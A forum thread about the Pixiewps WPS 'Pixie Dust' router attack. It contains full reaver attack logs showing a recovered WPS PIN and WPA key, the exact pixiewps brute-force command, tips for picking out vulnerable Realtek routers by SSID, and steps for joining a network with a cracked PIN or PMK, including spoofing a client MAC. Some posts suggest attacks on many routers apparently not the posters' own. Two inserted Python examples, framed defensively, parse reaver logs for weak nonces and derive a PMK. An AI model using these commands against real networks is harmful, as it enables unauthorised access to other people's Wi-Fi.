
Thread: Pixiewps: wps pixie dust attack tool

  1. #201
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Good example kcdtv. Thanks

  2. #202
    Join Date
    2015-Mar
    Posts
    141
    That's a good little write-up kcdtv, very informative :-)

  3. #203
    Join Date
    2015-Mar
    Location
    Morocco
    Posts
    8
    Thank you so much for your explanation kcdtv, I got it now

  4. #204
    Join Date
    2013-Sep
    Posts
    262
    I realize now that there is a little trick that can be used to identify vulnerable routers very fast.
    It seems that the default SSID with this Realtek SoC (RTL819X project) is.... the router model.
    My Totolink N301 RT has for default SSID TOTOLINK N301RT
    Then I checked the default SSID for another device that has the same SDK, the Prolink PRN3001A.
    The default SSID also gives the model straight away in this case:

    What about the TrendNet TEW-638AP?
    They have an emulator online, so it's fast to check:

    Conclusion: if you see the model name in the ESSID and pixiewps suggests you try again in brute force mode because it has an RTL819x, you should use the start and end options, focusing from end 2011 to end 2012/beginning 2013, when this kind of device was launched.
    I had a look at the firmware versions for these models and I didn't see any new firmware released after 2014 for this kind of device.
    So I am pretty sure that at least by adding --start 2014 you will find the PIN and save some time, as you won't brute force from 2016 to 2014.
    These devices are not old but they have already been at the end of their production cycle for some years.
    It means that the manufacturer does not provide new firmware versions and the last "build time" that is used as a seed in the DH exchange is the date of the version of one of the firmwares available.

    Other trick: if you see an image in a manual or by checking with Google, the layout of the web interface with this Realtek SDK can give you a clue (if the manufacturer didn't change it all)
    An image is worth more than an explanation ...
    Do you have an impression of déjà-vu?

  5. #205
    Join Date
    2016-Jan
    Posts
    4
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new reaver? Check out the YouTube video. You don't need wire shark at all.
    I was not able to find the YouTube video for the new reaver. Could you please PM me the link? I would appreciate it.

  6. #206
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by Necony286 View Post
    I was not able to find the YouTube video for the new reaver. Could you please PM me the link? I would appreciate it.
    A) Can't post youtube links in this forum.
    B) Can't PM in this forum.

  7. #207
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Any new video for this on youtube will feature the new reaver/bully. Just search it.

  8. #208
    Join Date
    2016-Jan
    Location
    Montreal, CA
    Posts
    12
    Very informative thread but I must say it's a little confusing to me as I'm relatively new to Kali and I'm on a Nexus 7 2013, which doesn't really make things simple.
    Kali does come with pixiewps and reaver but not the latest versions, nor the mod. I believe I effed something up while I was trying to git clone both of these, as I no longer have pixiewps (neither normally from bash nor from the supposed install folder /usr/local/bin); wonder if this will require the whole flash stock/flash kali etc etc...
    Also I'm running a TP-Link TL-WN722N and when I try to airmon-ng start wlan1mon ... the TP-Link flashes but nothing actually shows up, unlike in @kcdtv's post on the previous page. I can stop it fine and I can pick up networks when I run wifite.

    Any pointers? I know it sounds rather vague... I'm just looking for general to detailed resources/articles if you happen to know some or have actually written some yourselves..
    Thanks

  9. #209
    Join Date
    2016-Feb
    Posts
    4
    Kali 2.0 Live with the new Reaver and Pixie-Dust returns 2 solutions for the same AP, 1 minute later, in every attempt.
    Why would this happen?

    DATA:

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    xx:xx:xx:xx:xx:xx -75 399 0 0 11 54e WPA2 CCMP PSK yyy_zzzzzzzz_123456

    BSSID STATION PWR Rate Lost Frames Probe


    root@kali:~# reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -K 1

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: ca:ac:0a:6f:4f:6b:f9:0c:d0:4a:82:2c:0c:47:f0:cc:cd:97:fb:5e:f0:3c:9c:bc:28:93:17:d8:ea:3b:19:c5:ef:90:9d:57:41:30:1f:03:5c:b7:4f:23:14:dc:39:2b:27:ea:83:50:eb:56:90:43:bb:de:0e:e7:2d:49:47:89:88:ab:ea:c7:f1:bb:fc:7b:fd:21:aa:41:0a:08:8f:70:35:69:86:9c:c4:48:f9:6f:a7:1f:2d:ce:b5:44:17:18:40:f9:22:f4:c1:e1:38:83:cd:3c:51:41:54:26:c4:36:2c:79:ce:ea:89:67:ca:b8:44:99:e1:df:45:50:ef:a9:7a:3e:d7:90:e1:cf:af:f9:6b:82:4b:ad:61:f6:6d:63:ec:e1:cc:b6:dd:e0:2e:5e:3b:f6:80:fc:26:e4:e2:d0:52:33:bf:fa:02:a8:27:f1:82:b6:5a:4a:33:9d:a8:07:b9:f2:52:8f:ec:ab:52:a5:b7:7d:3a:6a:1f:6b:30:2f
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 91:b0:15:9d:19:e6:11:a1:a2:c1:b4:5a:b4:7d:53:14
    [P] PKR: 34:ef:cc:3d:69:6c:68:22:35:b3:88:b0:2f:57:c1:c2:54:fb:08:53:70:d9:2f:ed:a2:9d:f5:83:ce:12:7f:11:c4:3f:42:61:9b:db:65:b7:b2:4e:8a:04:92:9d:fd:9b:02:ee:ed:8f:d9:c3:84:28:d3:ec:aa:a9:0a:8c:06:75:0b:97:6e:f3:5d:db:a2:28:32:84:c9:99:b8:3c:7a:c4:92:ff:03:37:13:6c:f5:0f:d4:30:0f:80:0a:45:0d:9a:10:b8:54:ee:b5:1b:83:47:91:2f:a9:7d:b7:a2:16:1e:95:06:01:00:f6:1e:4e:1e:40:33:59:f9:0e:04:3c:35:0c:21:b8:e3:62:fe:81:14:7c:ad:c7:08:5e:62:9d:4a:a3:07:e6:69:1f:a7:bb:f4:f9:5f:ed:76:42:73:2e:a9:28:5f:41:64:89:61:ff:b0:18:f6:22:a9:8c:81:18:3c:07:e8:9a:65:a6:ac:9a:d3:23:eb:10:62:a2:d4:27:98
    [P] AuthKey: b4:06:48:58:73:26:c6:5d:dd:13:c7:56:ce:71:ff:ef:de:48:51:4e:78:57:29:25:7f:40:b0:42:19:94:19:8e
    [P] E-Hash1: 77:a5:51:89:2c:1b:e3:ef:b0:f2:8d:04:80:e9:25:1f:28:34:a1:a2:0b:3c:bd:8f:c0:22:d7:e4:1f:7f:5e:34
    [P] E-Hash2: 30:75:c2:fe:29:c0:bc:6d:d4:1a:d1:54:15:21:33:ac:23:44:f1:4e:3a:35:31:ce:0f:c7:10:58:fa:34:8c:aa
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 10427880
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

    [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
    [Reaver Test] Channel: 11
    [Reaver Test] [+] WPS PIN: '10427880'
    [Reaver Test] [+] WPA PSK: 'dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e555a014277034ec16'
    [Reaver Test] [+] AP SSID: 'yyy_zzzzzzzz_123456'
    root@kali:~#



    NEXT 1 MINUTE LATER

    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212

    [+] Waiting for beacon from xx:xx:xx:xx:xx:xx
    [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzzz_123456)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 29:2a:f4:1a:a8:68:ea:00:7f:e4:e3:a2:56:30:9c:86:11:75:8d:e8:cf:f0:d5:42:fb:f7:84:06:9b:00:9c:a2:63:47:e4:9f:05:d8:a7:c9:4f:b1:63:4c:69:6f:9d:38:18:b9:2e:ee:4d:a6:74:ad:8a:d3:c9:05:a2:74:b5:e9:6b:7e:86:10:0f:7c:28:54:cd:d8:3c:19:4a:2a:6c:f7:b3:ac:bd:66:09:c1:86:43:18:be:f0:cb:24:f9:1f:cc:7b:21:ef:97:46:a3:50:77:83:5f:90:f0:81:5d:77:0a:cf:d4:ec:ee:97:db:90:ce:36:a1:3c:1e:ac:63:31:f8:ec:ef:1a:d1:51:1a:9f:c8:4b:2f:fe:8f:f9:c2:23:6c:f3:e6:27:2e:a2:d4:0d:fa:f3:cd:fe:4a:85:0b:89:86:1f:cd:20:1c:a1:90:cc:44:a4:d7:00:81:75:51:1c:9c:e1:f6:14:b5:cc:d9:11:e9:fd:80:bc:86:cb:61:52:de
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 9f:8c:14:96:8c:11:b1:23:ad:c1:6b:8a:04:1a:e5:7c
    [P] PKR: af:1b:86:49:f5:32:dc:9f:6b:77:fd:b8:70:3f:02:27:0e:80:ce:f4:f3:29:8c:85:6e:d1:87:21:ad:7a:27:37:b0:4f:b7:27:36:bb:dc:0c:08:94:40:c6:56:0c:3b:91:41:71:bd:d2:74:3f:ea:39:cc:33:f4:be:c3:22:19:6d:b7:f5:ae:8b:16:ae:a0:0c:33:c3:a5:39:85:34:42:af:db:2d:00:58:09:01:53:bf:c5:f8:db:57:89:d3:73:eb:db:f6:06:3d:0a:95:0a:a0:d2:08:ab:8c:2c:16:77:26:8d:9a:6f:0f:03:9a:aa:2b:69:10:8e:e1:38:09:8f:05:6a:2a:f4:a6:ed:a8:d7:c6:9d:f1:6b:b5:bf:ed:47:9d:4d:67:35:9d:a9:93:aa:e9:83:fc:30:93:8c:17:1c:4d:27:6f:00:b5:ad:09:3c:e7:76:38:9c:d3:b2:d3:37:bb:1a:00:4a:8b:e0:d5:79:e2:86:c4:a6:7b:21:94:1e:ba
    [P] AuthKey: ff:91:1a:65:26:a1:81:a4:2b:d3:f5:39:2d:e7:b8:5d:09:29:56:fd:3f:7b:ca:01:ac:60:fc:66:5a:3a:2b:93
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 49:da:96:93:49:b0:a9:71:4a:82:5c:9b:9a:e3:cc:39:04:f1:9c:08:9e:2c:de:a1:e5:1e:c6:79:6b:2c:84:88:b7:4f:0c:c8:6a:b5:07:7b:2c:d6:1b:5b:f7:66:be:90:53:3b:ea:b2:a6:95:5a:26:d6:81:ee:92:dd:5c:e6:da:c4:55:c9:9b:88:9f:27:16:a6:d8:8d:35:7c:46:45:14:65:21:94:2f:c8:44:5a:47:31:12:60:9b:53:54:df:ae:b8:36:4a:44:39:74:6e:18:6c:32:e1:f7:ab:e8:c8:46:d2:67:41:2d:2f:e1:77:a5:ea:4e:63:2e:54:ba:41:c6:58:f3:4c:df:9c:cc:9c:0f:a8:48:17:be:e7:a3:b4:2a:e7:a4:d9:0a:3a:b6:f6:f5:04:0b:b1:f6:e5:d9:5a:88:c8:7e:da:0a:90:d1:08:74:61:47:23:b1:05:b2:e6:83:76:07:fe:06:38:5c:c9:1b:21:ee:1a:fd:88:28:ea:41
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: b9:a2:80:a8:97:75:b9:10:c4:1a:fe:d2:f9:97:59:0a
    [P] PKR: e9:10:a8:1a:a5:cd:21:9a:67:93:0d:ee:2a:a8:30:87:6f:80:e8:32:b3:62:c4:cb:a3:2d:72:fc:66:ab:93:ea:24:bc:d0:b1:29:1c:b6:cb:fa:dc:76:ab:77:99:9d:ae:da:91:02:d6:de:fe:e6:1a:86:c4:dc:c9:31:3d:08:07:5f:07:84:41:77:15:2f:74:75:fb:62:46:e8:c8:94:c4:28:c1:63:a3:07:2b:46:30:1e:11:e2:c2:c0:4d:61:ca:32:7d:23:6f:88:07:aa:da:95:29:77:6d:7d:28:da:56:0d:a6:fa:57:81:7f:cb:df:bf:8c:07:bd:74:88:f5:16:51:48:08:83:ab:5f:71:8c:c4:53:dc:b0:36:85:ab:ea:1b:97:0d:a8:38:50:55:7f:89:73:23:e1:0f:d7:ba:ad:0c:8e:77:3e:ab:1f:c0:73:9e:d1:5e:57:46:52:61:f2:6c:f6:e2:44:2d:ec:2c:b3:6a:d4:84:c1:67:b3:a5:ea
    [P] AuthKey: e4:a5:f2:82:31:25:aa:e0:5b:cb:7b:09:4e:91:b7:46:28:95:8a:ae:d7:55:4a:52:87:38:87:d0:d4:f0:6d:0d
    [P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
    [P] PKE: 2b:d9:be:8f:b9:9f:53:4f:30:2e:e7:b0:e0:e8:0f:21:3b:94:44:73:c4:70:ed:d0:24:45:57:e9:74:10:38:63:10:7e:26:7d:57:3b:38:3d:f7:e1:c6:40:09:a4:cd:c1:46:5d:e1:60:97:aa:ca:a1:24:c6:ca:fa:38:5a:9c:56:65:18:2e:14:35:11:26:17:0a:d9:40:04:7b:99:dc:0f:90:5d:63:4d:09:4c:85:19:8c:9e:19:a8:48:85:97:7f:ae:7c:a0:29:fa:12:d2:fb:0c:b3:30:2d:46:61:fa:2d:d9:5f:9d:ee:9d:6e:1d:b6:1d:08:4c:64:f7:1f:3a:b7:cb:54:f4:03:b0:60:94:c2:cb:b4:e5:d7:2f:71:1b:ae:57:c8:60:c5:dd:a1:c9:82:31:81:70:af:45:97:67:21:d3:d2:4f:1e:f2:81:48:14:8d:67:be:58:f7:3d:ff:ed:e2:fc:50:8a:f7:ef:e1:00:9a:9a:9b:0e:b6:a4:f5:80
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Name: Ralink Wireless Access Point
    [P] WPS Model Number: RT2860
    [P] Access Point Serial Number: 12345678
    [P] R-Nonce: 47:b8:f7:80:fc:31:5b:a7:c7:58:6f:40:30:68:a9:04
    [P] PKR: 4b:85:25:b3:7e:61:dc:a6:c6:d3:c2:45:5d:90:3a:cb:b0:53:37:94:02:dd:29:17:68:04:1d:3b:3a:6a:1a:40:ca:c1:8b:22:e8:4b:ae:f6:08:d8:a7:a3:6c:1b:29:ea:ec:95:1d:ed:19:56:89:15:f0:0f:8f:74:73:dd:ba:27:0b:ea:0b:bd:54:36:24:57:40:25:be:15:e1:a8:9a:24:d8:10:04:25:66:f3:01:f7:b1:84:51:b3:7d:cc:a7:3c:e4:c8:4c:d9:4e:52:77:2c:61:3a:d0:ed:dc:b3:e0:31:17:77:5e:e7:9c:51:9a:93:e2:09:bc:cf:f1:d2:d6:91:5c:e0:07:ec:34:1b:77:89:47:ec:f2:65:88:97:65:de:74:2f:0b:69:6b:44:20:f9:d1:b3:ab:07:c9:e7:4d:e0:21:a2:01:b9:1a:33:e9:b6:5b:78:ee:b4:46:62:7c:70:06:d0:43:57:d1:04:76:d9:e6:64:1b:d6:50:3a:27:31
    [P] AuthKey: 5f:c8:ce:60:82:fe:54:52:5d:d3:88:0a:5f:45:68:77:78:60:23:1d:f6:59:82:74:61:cd:bc:0f:96:e9:36:7a
    [P] E-Hash1: 5e:6f:2d:98:5c:81:ab:8e:46:21:76:99:b0:be:81:98:0f:25:88:ae:ee:c0:24:67:49:23:c4:4d:01:f7:d2:a7
    [P] E-Hash2: a3:1a:25:b2:34:75:46:b4:3a:a8:df:12:7e:01:44:e5:d3:6e:66:1e:73:81:bd:4a:5e:f4:2d:fe:46:12:19:80
    [Pixie-Dust]
    [Pixie-Dust] Pixiewps 1.1
    [Pixie-Dust]
    [Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust] [+] WPS pin: 10427880
    [Pixie-Dust]
    [Pixie-Dust][*] Time taken: 0 s
    [Pixie-Dust]
    Running reaver with the correct pin, wait ...
    Cmd : reaver -i wlan0 -b xx:xx:xx:xx:xx:xx -c 11 -s y -vv -p 10427880

    [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
    [Reaver Test] Channel: 11
    [Reaver Test] [+] WPS PIN: '10427880'
    [Reaver Test] [+] WPA PSK: 'd717380be0f1784ca16d3fc559d1a62a5e53a549cc061eb98e708c2019e01ca0'
    [Reaver Test] [+] AP SSID: 'yyy_zzzzzzzzz_123456'
    root@kali:~#
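    The two runs quoted above share one detail worth reading off the log: pixiewps reports E-S1 and E-S2 as all zeros, and the enrollee's E-Nonce is the same 16 bytes in both sessions and in every M1 of the second session, while the registrar side (R-Nonce, PKR) changes each time. Below is an added Python example (not code from this thread, from reaver or from pixiewps) that parses the [P] and [Pixie-Dust][*] lines in the format shown and reports those indicators, which is what you would check when assessing an access point you administer. The sample log is constructed from the values in the post above, trimmed to the relevant lines; the field names and the banner line are taken from the output as printed.

```python
import re
from collections import Counter

# Added example; not code from this thread, reaver or pixiewps.
# It reads the "[P] ..." and "[Pixie-Dust][*] ..." lines that the reaver
# pixie mod prints and reports the randomness indicators a defender checks
# on their own access point.

FIELD_RE = re.compile(
    r"^\s*(?:\[P\]|\[Pixie-Dust\]\[\*\])\s*([A-Za-z0-9 -]+?):\s*(.*?)\s*$")
HEX_FIELDS = {"E-Nonce", "R-Nonce", "PKE", "PKR", "AuthKey",
              "E-Hash1", "E-Hash2", "E-S1", "E-S2"}


def split_sessions(log_text):
    """One reaver run = one session; each starts with the 'Reaver v' banner."""
    parts = re.split(r"(?m)^(?=[ \t]*Reaver v)", log_text)
    return [p for p in parts if "Reaver v" in p]


def parse_session(session_text):
    """Collect every occurrence of each field, in order of appearance.
    Hex fields are normalised to lowercase hex without colons or spaces
    (the forum wraps long values and inserts spaces)."""
    fields = {}
    for line in session_text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        name, value = m.group(1), m.group(2)
        if name in HEX_FIELDS:
            value = re.sub(r"[\s:]", "", value).lower()
        fields.setdefault(name, []).append(value)
    return fields


def assess(sessions_text):
    """Return human-readable findings about nonce and secret randomness."""
    parsed = [parse_session(s) for s in sessions_text]
    findings = []
    for i, f in enumerate(parsed, 1):
        # pixiewps recovers the PIN offline when the enrollee secret nonces
        # E-S1/E-S2 are predictable; all-zero is the degenerate case.
        for secret in ("E-S1", "E-S2"):
            if any(set(v) == {"0"} for v in f.get(secret, [])):
                findings.append(f"session {i}: {secret} is all zeros "
                                "(enrollee secret nonce is not random)")
        nonces = f.get("E-Nonce", [])
        if len(nonces) > 1 and len(set(nonces)) < len(nonces):
            findings.append(f"session {i}: E-Nonce repeated across M1 retries")
    # A nonce must be fresh per session; reuse across runs points at a
    # deterministic or poorly seeded generator on the AP.
    seen = Counter()
    for f in parsed:
        for n in set(f.get("E-Nonce", [])):
            seen[n] += 1
    for n, count in seen.items():
        if count > 1:
            findings.append(f"E-Nonce {n} reused across {count} sessions "
                            "(nonces should be fresh per session)")
    return findings


# Constructed sample: two runs one minute apart, values from post #209,
# reduced to the lines the parser looks at.
SAMPLE_LOG = """\
Reaver v1.5.2 WiFi Protected Setup Attack Tool
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] WPS Manufacturer: Ralink Technology, Corp.
[P] WPS Model Number: RT2860
[P] R-Nonce: 91:b0:15:9d:19:e6:11:a1:a2:c1:b4:5a:b4:7d:53:14
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
Reaver v1.5.2 WiFi Protected Setup Attack Tool
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: yyy_zzzzzzzz_123456)
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] R-Nonce: 9f:8c:14:96:8c:11:b1:23:ad:c1:6b:8a:04:1a:e5:7c
[P] E-Nonce: 42:5c:96:08:58:07:cc:83:cf:d5:c8:32:23:d0:17:20
[P] R-Nonce: b9:a2:80:a8:97:75:b9:10:c4:1a:fe:d2:f9:97:59:0a
[Pixie-Dust][*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust][*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 10427880
"""

if __name__ == "__main__":
    for finding in assess(split_sessions(SAMPLE_LOG)):
        print(finding)
```

    Run it on a saved `reaver -vv` transcript (`python3 wps_log_check.py < reaver.log` after swapping `SAMPLE_LOG` for `sys.stdin.read()`); an AP that never changes its E-Nonce or whose E-S1/E-S2 come out as zeros is one where disabling WPS, or at least the PIN method, is the fix, since the weakness is in the firmware's random number source rather than in anything the PIN length can compensate for.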

  10. #210
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Pretty sure it is a hash of the actual password. Try with Bully: https://github.com/aanarchyy/bully

  11. #211

    PRNG brute force

    Can anyone explain the -f option in pixiewps and details about the PRNG ... steps involved in the PRNG attack including the command .. also inform whether the Linksys E900 is vulnerable to the attack??

  12. #212
    Join Date
    2016-Mar
    Posts
    2
    Quote Originally Posted by shrinivas murthi View Post
    Can anyone explain the -f option in pixiewps and details about the PRNG ... steps involved in the PRNG attack including the command .. also inform whether the Linksys E900 is vulnerable to the attack??
    Write in the terminal: pixiewps -e PKE -r PKR -s e-hash1 -z e-hash2 -a authkey -n e-nonce -f
    PKE/PKR/E-Hash1+2/AuthKey and E-Nonce are written in your reaver attack output on the specified BSSID

  13. #213
    Join Date
    2016-Feb
    Posts
    4

    Clarification and additional information

    I dunno
    Same result with bully and 7 of 8 of the pin numbers.
    This is not a crisis.
    I thought there may be some magic code in the AP or filter when another mac associated with it.
    It looked like a randomly generated 64 bit hex password.
    Thanks for the reply
    If you'd like, I can post the Bully log data.

    Let me clarify my two posts using Reaver and Bully.
    I am unable to connect to this AP with the first password solution.
    So, I used Reaver with Pixiedust 1 minute apart to glean information.
    There is no connect when I turn around and use my other desktop with the copied PSK on a USB.
    I provided the log to show the changing (the 64 hex number) answers.
    The pin number is always the same.
    Reaver has worked in about 5 cases and I can connect with those routers.
    There has been about 30 cases when the pin is not found or the association fails.
    I may have wrongly posted the Reaver log in a different thread.
    I don't think posting the Bully log will provide more helpful information.
    Last edited by helen2016; 2016-03-09 at 03:48. Reason: Clarification

  14. #214
    Join Date
    2015-Apr
    Posts
    29
    Quote Originally Posted by helen2016 View Post
    If you'd like, I can post the Bully log data.
    Yes, please

  15. #215
    Join Date
    2013-Sep
    Posts
    262
    It looked like a randomly generated 64 bit hex password.
    That's the PMK

  16. #216
    Join Date
    2015-Mar
    Posts
    141
    Yeah, you can use the 64 bit password hash just fine.

  17. #217
    Join Date
    2016-Feb
    Posts
    4
    Reply to "Try with Bully" probably posted in wrong thread.
    The results were the same, changing PSK and no connect.
    The pin number is always the same.
    My last attempt was copy and transfer the 64 PSK from laptop to desktop using TMAC V6 to spoof the client MAC obtained from airodump-ng.
    Still unable to connect, but I can see the process starting and failing.
    My wireless knowledge and coding ability, combined with stumbling terminal syntax, are far too low to go any further.
    Thanks for the replies and comments.

  18. #218
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Hm, my last consideration would either be that your wireless card is bad (which I doubt, since it seems to handle reaver and bully OK up to the point of receiving the PSK) or the router does not have WPS configured (or in any event, configured properly).

  19. #219
    Join Date
    2016-Mar
    Posts
    1
    First of all thanks to all the developers who have worked on this project.
    Now to help helen2016 about psk.
    You will need an android device.
    P.S. A rooted device will be better.
    Go to wifi settings.
    Tap on the ESSID. You will see a pop-up to enter the password. Tick the advanced option. You will see WPS and a dropdown box saying off. Tap on it, select "PIN from access point" and enter your WPS PIN.
    In less than two minutes you will be connected if the WPS PIN is correct and WPS is active on the AP.
    Now you can navigate to /data/misc/wifi/
    Open wpa_supplicant.conf as text
    and you can see the acquired password.
    Give it a try

  20. #220
    Join Date
    2013-Sep
    Posts
    262
    @ alkesh
    You do not need an Android device: any GNU/Linux distribution (Kali itself) can connect with a WPS PIN using wpa_cli from wpa_supplicant
    @ Helen
    You can connect with the PMK entered directly, at least with a GNU/Linux distribution (I don't know or use Windows).
    Don't forget to remove the "two points"...
    The passphrase is not used directly in the WPA protocol, it is just for humans; what is used is the PMK, which you can calculate like this:
    PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 256)
    A string is created with the passphrase and ssid length, it is then passed 4096 times through the SHA-1 hash function and you keep the 256 first bytes (64 hex characters) to get your PMK
    It looks like a classical distance issue
    Get closer to your router
    And this "problem" has nothing to do with pixiewps, as the PIN is generated.
    You can check the PIN on the sticker under your router
    cheers
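    To make the derivation concrete, here is an added Python example; it is not code from this thread, from pixiewps or from wpa_supplicant. It implements the PMK formula above with the standard library's hashlib.pbkdf2_hmac, normalises a PSK printed with colons (the "two points") into the 64 hex digits that wpa_supplicant's psk= field accepts unquoted, and renders the network block either way. The test vector (passphrase "password", SSID "IEEE") is the one from the IEEE 802.11 standard's annex; the colon-separated sample PSK is constructed from the value reaver printed in post #209.

```python
import hashlib
import re

# Added example; not code from this thread, pixiewps or wpa_supplicant.
# Implements PMK = PBKDF2(HMAC-SHA1, passphrase, ssid, 4096, 256 bits).

PBKDF2_ITERATIONS = 4096   # fixed by WPA/WPA2-Personal
PMK_LEN_BYTES = 32         # 256 bits = 64 hex characters
_HEX64 = re.compile(r"^[0-9a-f]{64}$")


def derive_pmk(passphrase: str, ssid: str) -> str:
    """Return the PMK as 64 lowercase hex characters.

    The passphrase is the human-facing secret; the PMK is what the
    4-way handshake actually uses, so anyone holding it can join.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("a WPA passphrase is 8 to 63 characters")
    pmk = hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                              ssid.encode("utf-8"),
                              PBKDF2_ITERATIONS, PMK_LEN_BYTES)
    return pmk.hex()


def normalize_psk(raw: str) -> str:
    """Strip colons, whitespace and quotes from a PSK as reaver or bully
    print it, and check that exactly 256 bits remain."""
    cleaned = re.sub(r"[\s:'\"]", "", raw).lower()
    if not _HEX64.match(cleaned):
        raise ValueError(f"not a 64-hex-digit PMK: {raw!r}")
    return cleaned


def wpa_supplicant_network(ssid: str, secret: str) -> str:
    """Render a wpa_supplicant.conf network block.

    wpa_supplicant takes either psk="passphrase" (quoted) or psk=<64 hex>
    (unquoted, the PMK itself); the form is chosen from the input. A
    64-digit value cannot be a passphrase (max 63 chars), so the check
    is unambiguous.
    """
    try:
        psk_line = "psk=" + normalize_psk(secret)      # raw PMK, no quotes
    except ValueError:
        psk_line = 'psk="' + secret + '"'               # passphrase, quoted
    return "network={\n" + f'    ssid="{ssid}"\n' + f"    {psk_line}\n}}\n"


# Value reaver printed in post #209 (forum wrapping space removed); the
# colon-separated form is constructed from it for the demo.
REAVER_PSK = "dc7bc520883f02b6e784772ae7340cda5c85c8b2d9f389e555a014277034ec16"
REAVER_PSK_WITH_COLONS = ":".join(REAVER_PSK[i:i + 2] for i in range(0, 64, 2))

if __name__ == "__main__":
    # IEEE 802.11 test vector: passphrase "password", SSID "IEEE"
    print(derive_pmk("password", "IEEE"))
    print(normalize_psk(REAVER_PSK_WITH_COLONS) == REAVER_PSK)
    print(wpa_supplicant_network("yyy_zzzzzzzz_123456", REAVER_PSK_WITH_COLONS))
    print(wpa_supplicant_network("IEEE", "password"))
```

    Because the SSID is the salt, the same passphrase yields a different PMK on every network, and a PMK copied from one AP is useless on another; it also means the hex value is as sensitive as the passphrase itself and belongs in a root-only wpa_supplicant.conf, not in a forum post.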

  21. #221
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    kcdtv is right, you don't need an Android. Any linux distribution should do.

  22. #222
    Join Date
    2016-Apr
    Posts
    10

    Hello. RT2860

    Hi,

    Please, I'm trying to test a Ralink RT2860 but it constantly gives me an error "wps transaction failed (0x04)" and I can't get M3 or M4 messages.

    How can I get e-hashes out of this?

  23. #223
    Join Date
    2016-Apr
    Posts
    10
    Quote Originally Posted by t6_x View Post
    Finally able to create my account in this forum

    I already emailed the wiire on the tests I've done.

    First of all I made a modified version of reaver to facilitate the tests; this modification already does a pixie test when a pin is tested on reaver

    [P] E-Nonce: 41:f2:8c:82:53:3b:df:........
    [P] PKE: 6b:0e:22:cb:cd:21:........
    [P] WPS Manufacturer: Ralink Technology, Corp.
    [P] WPS Model Number: RT2860
    [+] Received message M1
    [P] AuthKey: f7:fb:bc:21:ab:3b:99:70:36:8e:f1:a0:........
    [+] Sending message M2
    [P] E-Hash1: 1e:d6:12:27:8f:12:28:21:9a:54:.........
    [P] E-Hash2: d:f:34:and:ac:55:a4:9e:b3:95:31:7a:61:b0:........
    [Pixie-Dust]
